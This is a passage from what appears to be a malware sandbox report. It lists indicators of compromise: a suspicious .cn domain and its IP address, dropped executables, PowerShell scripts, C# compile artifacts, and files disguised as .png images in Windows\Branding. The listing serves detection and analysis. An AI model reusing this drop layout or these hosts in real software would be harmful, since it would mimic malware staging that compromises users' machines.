N/A 8.8.8.8:53 pgf5ga4g4b.cn udp
N/A 206.188.196.143:443 pgf5ga4g4b.cn tcp

Files

C:\Users\Admin\AppData\Roaming\Templers\exe2.exe

C:\Users\Admin\AppData\Roaming\Templers\exe1.exe

C:\Users\Public\Documents\Wondershare\NFWCHK.exe

C:\Users\Public\Documents\Wondershare\NFWCHK.exe.config

C:\Users\Admin\AppData\Local\Temp\ready.ps1

\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\CSCB76A0FB192CC42A6896CCCC69F92E773.TMP

C:\Users\Admin\AppData\Local\Temp\RES2541.tmp

C:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.dll

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

\Windows\Branding\mediasrv.png

\Windows\Branding\mediasvc.png

C:\Users\Admin\AppData\Local\Temp\Setup.zip